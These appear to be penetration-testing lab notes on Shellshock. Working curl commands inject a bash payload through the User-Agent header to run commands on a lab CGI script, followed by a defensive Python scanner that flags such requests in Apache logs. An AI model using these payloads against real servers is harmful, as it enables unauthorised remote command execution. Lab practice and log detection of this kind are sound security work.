Controlling the Web Shell from the Terminal
Shellshock PoC Usage
Posting Initial Payload
As detailed in the Shellshock PoC, this exploit uses curl to send the payload to the web shell. The command's output is returned to curl and printed to the terminal, but the raw response is cluttered. Piping curl's output through sed prints only the lines between the two marker strings (aaaa and zzzz), i.e. just the output of the payload command:
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
Posting Subsequent Payloads
Rather than editing the payload portion of the command in the terminal each time we want to run a new command, we can store the command in a Bash variable and reference it from the payload, which speeds the process up considerably.
cmd="id"
curl -H "User-Agent: () { :; }; /bin/bash -c 'echo aaaa; ${cmd}; echo zzzz;'" http://10.11.1.71/cgi-bin/admin.cgi -s \
  | sed -n '/aaaa/{:a;n;/zzzz/b;p;ba}'
cmd="hostname -f"
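As an added defender-side example (not part of these notes), the Python below scans constructed Apache combined-format access log lines for the Shellshock prefix in the User-Agent header and recovers the command wrapped in the aaaa/zzzz markers described above. The log lines, timestamps and the 10.11.1.5 client address are made up; only the /cgi-bin/admin.cgi path and header shape come from the notes.

```python
import re

# Apache combined log format: the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>.*)"$'
)
# Shellshock function-definition prefix as used in the notes above
# ("() { :; };"), tolerating the whitespace variants seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")
# The aaaa/zzzz marker idiom: "echo <start>; <command>; echo <end>;".
MARKED_CMD_RE = re.compile(r"echo\s+(\w+);\s*(.+?);\s*echo\s+(\w+);")

# Constructed sample log lines (not real traffic); the first is benign,
# the second and third carry the Shellshock header from the notes.
SAMPLE_LOG = r"""
10.11.1.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.11.1.5 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 88 "-" "() { :; }; /bin/bash -c 'echo aaaa; uname -a; echo zzzz;'"
10.11.1.5 - - [10/Oct/2023:13:56:20 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 200 40 "-" "() { :;}; /bin/bash -c 'echo aaaa; id; echo zzzz;'"
""".strip().splitlines()


def parse_combined(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(lines):
    """Return one finding per request whose User-Agent carries the Shellshock
    prefix, with the marker-wrapped command recovered when it is present."""
    findings = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None or not SHELLSHOCK_RE.search(rec["user_agent"]):
            continue
        cmd = MARKED_CMD_RE.search(rec["user_agent"])
        findings.append({
            "src": rec["src"],
            "time": rec["time"],
            "request": rec["request"],
            "marked_command": cmd.group(2) if cmd else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} {f['request']!r} -> {f['marked_command']!r}")
```

Run against a real access log by replacing SAMPLE_LOG with the file's lines; requests that match the prefix but carry no marker pair still surface, with marked_command set to None.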